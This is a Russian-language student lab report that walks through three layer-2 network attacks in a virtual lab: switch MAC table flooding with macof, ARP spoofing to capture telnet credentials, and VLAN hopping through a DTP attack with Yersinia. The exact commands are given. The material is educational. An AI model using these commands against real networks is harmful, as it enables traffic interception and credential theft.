# Макаров Дмитрий Владиславович - Networks basic. Практическая работа №2. Канальный уровень - L2
# L2. Основные атаки на L2
[toc]
## Часть 1. Переполнение таблицы коммутации
1.1 Установим на **Kali Linux** необходимую утилиту
`apt update`
`apt install dsniff -y`
---

---
1.2 Включим атаку и через несколько секунд остановим её с помощью *ctrl+c*
`macof`
---

---
1.3 Увидим, что таблица коммутации **Switch7** переполнена. При этом другие устройства будут испытывать проблемы с сетью.
---

---
## Часть 2. Arp-Spoofing
2.1 Установим на **Win7** `telnet`
---

---
2.2 Проверим, может ли **Win7** подключаться по `telnet` к **Switch7**
`telnet 192.168.1.100`
---

---
2.3 Настроим **Kali** для атаки. Изменим параметры маршрутизации. Раскомментируем строку и сохраним файл
`nano /etc/sysctf.conf`
---

---
2.4 Применим изменения
`sysctl -p /etc/sysctl.conf`
---

---
2.5 Начнём атаку
Введём команду
`arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100`,
где
- 50 -- адрес **Win7**,
- 100 -- адрес **Switch7**,
- `eth0` -- сетевой интерфейс **Kali**
---

---
Включим **Wireshark** на **Kali**, после чего зайдём с **Win7** по `telnet` на **Switch7**. Найдём `telnet` трафик
---

---
Обнаружим в трафике аутентификационные данные пользователя
---

---
## Часть 3. VLAN hopping
3.1 Поместим **Win10** в `vlan10`
`Switch7(config)#int e1/2`
`Switch7(config-if)#switchport mode access`
`Switch7(config-if)#switchport access vlan 10`,
где `е1/2` -- интерфейс, подключенный к **Win10**
---

---
3.2 Сконфигурируем `trunk port` на **Switch7**
`Switch7(config)#int e0/0`
`Switch7(config-if)#switchport trunk encapsulation dot1q`
`Switch7(config-if)#switchport mode trunk`,
где `е0/0` -- интерфейс, подключенный к **Switch9**
---

---
Настроим на **Switch9** интерфейсы` е0/0`, `e0/1`, `e0/2` в **trunk**.
---

---
3.3 Настроим на роутере шлюз для `vlan 10`
`Router(config)#int e0/1.10`
`Router(config-subif)#encapsulation dot1q 10`
`Router(config-subif)#ip address 192.168.10.1 255.255.255.0`
---

---
:::info
:information_source: После этих настроек **Kali** и **Win10** будут доступны по сети, но трафик между ними будет проходить через маршрутизацию роутером. Используем атаку **VLAN hopping**, чтобы получить доступ в рамках широковещательного домена из **Kali** до **Win10**.
:::
3.4 Установим **Yersinia**
`apt install yersinia -y`
---

---
3.5 Запустим **Yersinia**
`yersinia -G`
---

---
3.6 Проведем атаку на протокол `DTP`
---

---
3.7 Подготовим интерфейсы **Kali**
`root@kali:# modprobe 8021q`
`root@kali:# vconfig add eth0 10`
`root@kali:# ifconfig eth0.10 up`
- где 10 -- `vlan id`
---

---
Далее выдaдим **ip** адрес на интерфейс `eth0.10` из сети **Win10** и сгенерируем трафик к **Win10**.
С помощью Wireshark проанализируем исходящий трафик от **Kali** найдём трафик с `vlan id 10`.
---

---